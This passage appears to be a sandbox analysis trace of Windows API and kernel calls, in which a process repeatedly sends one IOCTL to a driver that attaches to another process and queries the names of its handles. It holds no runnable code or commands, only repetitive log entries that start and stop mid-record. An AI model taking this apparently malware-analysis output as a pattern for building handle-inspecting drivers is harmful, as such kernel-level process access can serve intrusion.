lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.933] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.933] PsAcquireProcessExitSynchronization () returned 0x0 [0243.933] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.933] ObReferenceObjectByHandle (in: Handle=0x1ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0089fbe90, HandleInformation=0x0) returned 0x0 [0243.933] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.933] PsReleaseProcessExitSynchronization () returned 0x2 [0243.933] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.933] ObQueryNameString (in: Object=0xfffff8a0089fbe90, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.933] ObfDereferenceObject (Object=0xfffff8a0089fbe90) returned 0x1 [0243.933] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.933] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.933] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.933] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.933] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.933] PsAcquireProcessExitSynchronization () returned 0x0 [0243.933] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.933] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00111bd00, HandleInformation=0x0) returned 0x0 [0243.933] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.933] PsReleaseProcessExitSynchronization () returned 0x2 [0243.933] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.933] ObQueryNameString (in: Object=0xfffff8a00111bd00, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.933] ObfDereferenceObject (Object=0xfffff8a00111bd00) returned 0x1 [0243.933] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.934] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.934] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.934] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.934] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.934] PsAcquireProcessExitSynchronization () returned 0x0 [0243.934] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.934] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001187a40, HandleInformation=0x0) returned 0x0 [0243.934] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.934] PsReleaseProcessExitSynchronization () returned 0x2 [0243.934] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.934] ObQueryNameString (in: Object=0xfffff8a001187a40, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.934] ObfDereferenceObject (Object=0xfffff8a001187a40) returned 0x1 [0243.934] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.934] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.934] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.934] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.934] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.935] PsAcquireProcessExitSynchronization () returned 0x0 [0243.935] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.935] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ca62d0, HandleInformation=0x0) returned 0x0 [0243.935] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.935] PsReleaseProcessExitSynchronization () returned 0x2 [0243.935] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.935] ObQueryNameString (in: Object=0xfffff8a000ca62d0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.935] ObfDereferenceObject (Object=0xfffff8a000ca62d0) returned 0x1 [0243.935] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.935] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.935] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.935] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.935] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.935] PsAcquireProcessExitSynchronization () returned 0x0 [0243.935] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.935] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0011c6890, HandleInformation=0x0) returned 0x0 [0243.935] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.935] PsReleaseProcessExitSynchronization () returned 0x2 [0243.935] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.935] ObQueryNameString (in: Object=0xfffff8a0011c6890, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.936] ObfDereferenceObject (Object=0xfffff8a0011c6890) returned 0x1 [0243.936] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.936] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.936] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.936] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.936] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.936] PsAcquireProcessExitSynchronization () returned 0x0 [0243.936] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.936] ObReferenceObjectByHandle (in: Handle=0x208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0011a3fc0, HandleInformation=0x0) returned 0x0 [0243.936] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.936] PsReleaseProcessExitSynchronization () returned 0x2 [0243.936] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.936] ObQueryNameString (in: Object=0xfffff8a0011a3fc0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.936] ObfDereferenceObject (Object=0xfffff8a0011a3fc0) returned 0x1 [0243.936] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.936] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.936] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.936] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.936] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.936] PsAcquireProcessExitSynchronization () returned 0x0 [0243.936] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.937] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019f4af0, HandleInformation=0x0) returned 0x0 [0243.937] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.937] PsReleaseProcessExitSynchronization () returned 0x2 [0243.937] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.937] ObQueryNameString (in: Object=0xfffff8a0019f4af0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.937] ObfDereferenceObject (Object=0xfffff8a0019f4af0) returned 0x1 [0243.937] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.937] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.937] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.937] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.937] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.937] PsAcquireProcessExitSynchronization () returned 0x0 [0243.937] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.937] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001055e60, HandleInformation=0x0) returned 0x0 [0243.937] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.937] PsReleaseProcessExitSynchronization () returned 0x2 [0243.937] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.937] ObQueryNameString (in: Object=0xfffff8a001055e60, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.937] ObfDereferenceObject (Object=0xfffff8a001055e60) returned 0x1 [0243.937] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.937] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.938] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.938] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.938] PsAcquireProcessExitSynchronization () returned 0x0 [0243.938] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.938] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00105bac0, HandleInformation=0x0) returned 0x0 [0243.938] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.938] PsReleaseProcessExitSynchronization () returned 0x2 [0243.938] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.938] ObQueryNameString (in: Object=0xfffff8a00105bac0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.938] ObfDereferenceObject (Object=0xfffff8a00105bac0) returned 0x1 [0243.938] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.938] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.938] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.938] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.938] PsAcquireProcessExitSynchronization () returned 0x0 [0243.938] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.938] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013268c0, HandleInformation=0x0) returned 0x0 [0243.938] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.938] PsReleaseProcessExitSynchronization () returned 0x2 [0243.938] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.939] ObQueryNameString (in: Object=0xfffff8a0013268c0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.939] ObfDereferenceObject (Object=0xfffff8a0013268c0) returned 0x1 [0243.939] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.939] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.939] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.939] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.939] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.939] PsAcquireProcessExitSynchronization () returned 0x0 [0243.939] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.939] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0012c2e70, HandleInformation=0x0) returned 0x0 [0243.939] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.939] PsReleaseProcessExitSynchronization () returned 0x2 [0243.939] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.939] ObQueryNameString (in: Object=0xfffff8a0012c2e70, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.939] ObfDereferenceObject (Object=0xfffff8a0012c2e70) returned 0x1 [0243.939] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.939] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.939] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.939] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.939] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.939] PsAcquireProcessExitSynchronization () returned 0x0 [0243.940] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.940] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013e11a0, HandleInformation=0x0) returned 0x0 [0243.940] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.940] PsReleaseProcessExitSynchronization () returned 0x2 [0243.940] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.940] ObQueryNameString (in: Object=0xfffff8a0013e11a0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.940] ObfDereferenceObject (Object=0xfffff8a0013e11a0) returned 0x1 [0243.940] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.940] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.940] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.940] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.940] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.940] PsAcquireProcessExitSynchronization () returned 0x0 [0243.940] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.940] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013f0e00, HandleInformation=0x0) returned 0x0 [0243.940] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.940] PsReleaseProcessExitSynchronization () returned 0x2 [0243.940] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.940] ObQueryNameString (in: Object=0xfffff8a0013f0e00, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.940] ObfDereferenceObject (Object=0xfffff8a0013f0e00) returned 0x1 [0243.940] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.941] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.941] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.941] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.941] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.941] PsAcquireProcessExitSynchronization () returned 0x0 [0243.941] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.941] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013f7fc0, HandleInformation=0x0) returned 0x0 [0243.941] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.941] PsReleaseProcessExitSynchronization () returned 0x2 [0243.941] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.941] ObQueryNameString (in: Object=0xfffff8a0013f7fc0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.941] ObfDereferenceObject (Object=0xfffff8a0013f7fc0) returned 0x1 [0243.941] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.941] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.941] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.941] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.941] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.942] PsAcquireProcessExitSynchronization () returned 0x0 [0243.942] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.942] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0012d5b50, HandleInformation=0x0) returned 0x0 [0243.942] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.942] PsReleaseProcessExitSynchronization () returned 0x2 [0243.942] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.942] ObQueryNameString (in: Object=0xfffff8a0012d5b50, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.942] ObfDereferenceObject (Object=0xfffff8a0012d5b50) returned 0x1 [0243.942] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.942] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.942] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.942] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.942] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.942] PsAcquireProcessExitSynchronization () returned 